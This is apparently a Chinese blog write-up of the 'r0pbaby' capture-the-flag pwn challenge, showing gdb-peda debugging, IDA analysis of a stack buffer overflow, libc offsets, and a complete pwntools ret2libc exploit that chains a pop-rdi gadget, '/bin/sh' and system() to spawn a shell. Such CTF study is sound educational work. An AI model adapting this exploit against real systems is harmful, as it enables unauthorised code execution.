pwn练习1--r0pbaby

peda常用命令
checksec 检测安全机制
dumprop 内存中搜索rop
pattern create [数字] 生成数据
pattern offset [内存错误地址] 计算覆盖所需偏移
info proc mappings 查看允许访问的地址

绑定端口测试:
socat tcp-listen:[端口],fork exec:./[二进制文件]

ROPgarget工具搜索gadget:
ROPgadget --binary [二进制文件] --only "pop|ret"

题目

bin.png

可以得到libc.so.6基址,system地址,根据提示可能有溢出点

动态调试
发现功能1并没有给真正的地址,功能2为正确的

gdb-peda$ b _IO_getc
Breakpoint 1 at 0x9f0
gdb-peda$ r
Starting program: /root/Desktop/pwn_practice/r0pbaby/r0pbaby 

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 
[----------------------------------registers-----------------------------------]
RAX: 0x2 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7ffff7bd08c0 --> 0x0 
RSI: 0x3ff 
RDI: 0x7ffff7bcea00 --> 0xfbad2088 
RBP: 0x0 
RSP: 0x7fffffffdcc8 --> 0x555555554bc8 (cmp    eax,0xffffffff)
RIP: 0x7ffff788fe30 (<_IO_getc>:    push   rbx)
R8 : 0x7ffff7fd3740 (0x00007ffff7fd3740)
R9 : 0x7ffff78bbeb0 (<__wcpcpy>:    sub    rsi,rdi)
R10: 0x865 
R11: 0x7ffff788fe30 (<_IO_getc>:    push   rbx)
R12: 0x7fffffffdd10 --> 0x2 
R13: 0x7ffff7bcf850 --> 0x7ffff7bcea00 --> 0xfbad2088 
R14: 0x3ff 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff788fe1c <__GI_fseek+284>: call   0x7ffff783bcc0 <_Unwind_Resume>
   0x7ffff788fe21:  nop    WORD PTR cs:[rax+rax*1+0x0]
   0x7ffff788fe2b:  nop    DWORD PTR [rax+rax*1+0x0]
=> 0x7ffff788fe30 <_IO_getc>:   push   rbx
   0x7ffff788fe31 <_IO_getc+1>: test   BYTE PTR [rdi+0x74],0x80
   0x7ffff788fe35 <_IO_getc+5>: mov    rbx,rdi
   0x7ffff788fe38 <_IO_getc+8>: jne    0x7ffff788fe60 <_IO_getc+48>
   0x7ffff788fe3a <_IO_getc+10>:    mov    rax,QWORD PTR [rdi+0x8]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcc8 --> 0x555555554bc8 (cmp    eax,0xffffffff)
0008| 0x7fffffffdcd0 --> 0x7fffffffdd10 --> 0x2 
0016| 0x7fffffffdcd8 --> 0x7fffffffe150 --> 0x555555554ec0 (push   r15)
0024| 0x7fffffffdce0 --> 0x555555554a60 (xor    ebp,ebp)
0032| 0x7fffffffdce8 --> 0x7fffffffe230 --> 0x1 
0040| 0x7fffffffdcf0 --> 0x0 
0048| 0x7fffffffdcf8 --> 0x555555554cdc (test   rax,rax)
0056| 0x7fffffffdd00 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, _IO_getc (fp=0x7ffff7bcea00 <_IO_2_1_stdin_>) at getc.c:34
34  getc.c: 没有那个文件或目录.
gdb-peda$ print system
$1 = {<text variable, no debug info>} 0x7ffff785c510 <__libc_system>
gdb-peda$ c
Continuing.
2

system

Symbol system: 0x00007FFFF785C510
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 
[----------------------------------registers-----------------------------------]
RAX: 0x2 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7ffff7bd08c0 --> 0x0 
RSI: 0x3ff 
RDI: 0x7ffff7bcea00 --> 0xfbad2288 
RBP: 0x0 
RSP: 0x7fffffffdcc8 --> 0x555555554bc8 (cmp    eax,0xffffffff)
RIP: 0x7ffff788fe30 (<_IO_getc>:    push   rbx)
R8 : 0x7ffff7fd3740 (0x00007ffff7fd3740)
R9 : 0x7fffffffb4dc --> 0x2200007fff 
R10: 0x555555554fbb --> 0x732064614200203a (': ')
R11: 0x246 
R12: 0x7fffffffdd10 --> 0x6d6574737973 ('system')
R13: 0x7ffff7bcf850 --> 0x7ffff7bcea00 --> 0xfbad2288 
R14: 0x3ff 
R15: 0x0
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff788fe1c <__GI_fseek+284>: call   0x7ffff783bcc0 <_Unwind_Resume>
   0x7ffff788fe21:  nop    WORD PTR cs:[rax+rax*1+0x0]
   0x7ffff788fe2b:  nop    DWORD PTR [rax+rax*1+0x0]
=> 0x7ffff788fe30 <_IO_getc>:   push   rbx
   0x7ffff788fe31 <_IO_getc+1>: test   BYTE PTR [rdi+0x74],0x80
   0x7ffff788fe35 <_IO_getc+5>: mov    rbx,rdi
   0x7ffff788fe38 <_IO_getc+8>: jne    0x7ffff788fe60 <_IO_getc+48>
   0x7ffff788fe3a <_IO_getc+10>:    mov    rax,QWORD PTR [rdi+0x8]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcc8 --> 0x555555554bc8 (cmp    eax,0xffffffff)
0008| 0x7fffffffdcd0 --> 0x7fffffffdd10 --> 0x6d6574737973 ('system')
0016| 0x7fffffffdcd8 --> 0x7fffffffe150 --> 0x555555554ec0 (push   r15)
0024| 0x7fffffffdce0 --> 0x555555554a60 (xor    ebp,ebp)
0032| 0x7fffffffdce8 --> 0x7fffffffe230 --> 0x1 
0040| 0x7fffffffdcf0 --> 0x0 
0048| 0x7fffffffdcf8 --> 0x555555554cdc (test   rax,rax)
0056| 0x7fffffffdd00 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, _IO_getc (fp=0x7ffff7bcea00 <_IO_2_1_stdin_>) at getc.c:34
34  in getc.c
gdb-peda$ i proc mappings 
process 6669
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555556000     0x2000        0x0 /root/Desktop/pwn_practice/r0pbaby/r0pbaby
      0x555555755000     0x555555757000     0x2000     0x1000 /root/Desktop/pwn_practice/r0pbaby/r0pbaby
      0x555555757000     0x555555778000    0x21000        0x0 [heap]
      0x7ffff781a000     0x7ffff79cb000   0x1b1000        0x0 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff79cb000     0x7ffff7bca000   0x1ff000   0x1b1000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bca000     0x7ffff7bce000     0x4000   0x1b0000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bce000     0x7ffff7bd0000     0x2000   0x1b4000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bd0000     0x7ffff7bd4000     0x4000        0x0 
      0x7ffff7bd4000     0x7ffff7bd7000     0x3000        0x0 /lib/x86_64-linux-gnu/libdl-2.27.so
      0x7ffff7bd7000     0x7ffff7dd6000   0x1ff000     0x3000 /lib/x86_64-linux-gnu/libdl-2.27.so
      0x7ffff7dd6000     0x7ffff7dd7000     0x1000     0x2000 /lib/x86_64-linux-gnu/libdl-2.27.so
      0x7ffff7dd7000     0x7ffff7dd8000     0x1000     0x3000 /lib/x86_64-linux-gnu/libdl-2.27.so
      0x7ffff7dd8000     0x7ffff7dfd000    0x25000        0x0 /lib/x86_64-linux-gnu/ld-2.27.so
      0x7ffff7fd3000     0x7ffff7fd8000     0x5000        0x0 
      0x7ffff7ff7000     0x7ffff7ffa000     0x3000        0x0 [vvar]
      0x7ffff7ffa000     0x7ffff7ffc000     0x2000        0x0 [vdso]
      0x7ffff7ffc000     0x7ffff7ffd000     0x1000    0x24000 /lib/x86_64-linux-gnu/ld-2.27.so
      0x7ffff7ffd000     0x7ffff7ffe000     0x1000    0x25000 /lib/x86_64-linux-gnu/ld-2.27.so
      0x7ffff7ffe000     0x7ffff7fff000     0x1000        0x0 
      0x7ffffffde000     0x7ffffffff000    0x21000        0x0 [stack]
gdb-peda$ c
Continuing.
1
gdb-peda$ c
Continuing.
libc.so.6: 0x00007FFFF7FD64F0

查看保护

sec.png

在IDA中找到函数

of.png

即进入功能3,字符串先放到 nptr 里面,之后被 memcpy 到 savedregs 里

char nptr[1088]; // [sp+10h] [bp-440h]@2
__int64 savedregs; // [sp+450h] [bp+0h]@22 // on rpb

可以看到 saveregs 正好位在 rbp 上,复制到 saveregs 就会从 rbp 开始写入。
saveregs是IDA的关键字,保存的实际上是函数的栈帧指针RBP和返回地址

由于程序开启数据执行保护(NX/DEP),栈上的数据无法当成指令来执行,所以要寻找rop进行绕过。可在libc.so.6中寻找rop。

尽管ASLR的存在,libc的基址会变化,但是程序本身已经提供了leak info的菜单。不仅可以拿到libc的基址,也可以拿到任意函数的地址。而另一方面,可以通过search libc.so.6来找到”/bin/sh”相对libc基址的偏移,或者相对system的偏移,从而算出真实地址。

分析libc.so.6找到关键信息

binsh.png
sys.png
pop rdi.png
sh.png

得到关键的偏移地址:

rdi_gadget_offset = 0x2144f
bin_sh_offset = 0x17d3f3
system_offset = 0x42510



libc_base = system - system_offset
rdi_gadget_addr = libc_base + rdi_gadget_offset
bin_sh_addr = libc_base + bin_sh_offset

测试exp:

from pwn import *
debug = 1
if debug == 1:
    io = process("./r0pbaby")
else:
    io = remote("127.0.0.1",10001)
io.recvuntil(": ")
io.send("2\n")
io.recv(1024)
io.send("system\n")
msg = io.recv(1024)
offset = msg.find(":")
offset2 = msg.find("\n")
base = msg[offset+2:offset2]
system = long(base,16)
print hex(system)
rdi_gadget_offset = 0x2144f
bin_sh_offset = 0x17d3f3
system_offset = 0x42510
libc_base = system - system_offset
print "[+] libc base: [%x]" % libc_base
rdi_gadget_addr = libc_base + rdi_gadget_offset
print "[+] RDI gadget addr: [%x]" % rdi_gadget_addr
bin_sh_addr = libc_base + bin_sh_offset
print "[+] \"/bin/sh\" addr[%x]" % bin_sh_addr
print "[+] system addr:[%x]" % system
payload = "A"*8
payload += p64(rdi_gadget_addr)
payload += p64(bin_sh_addr)
payload += p64(system)
io.sendline("3")
io.recv(1024)
io.send("%d\n"%(len(payload)+1))
io.sendline(payload)
io.sendline("4")
io.interactive()

test:

test.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,132评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,802评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,566评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,858评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,867评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,695评论 1 282
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,064评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,705评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,915评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,677评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,796评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,432评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,041评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,992评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,223评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,185评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,535评论 2 343

推荐阅读更多精彩内容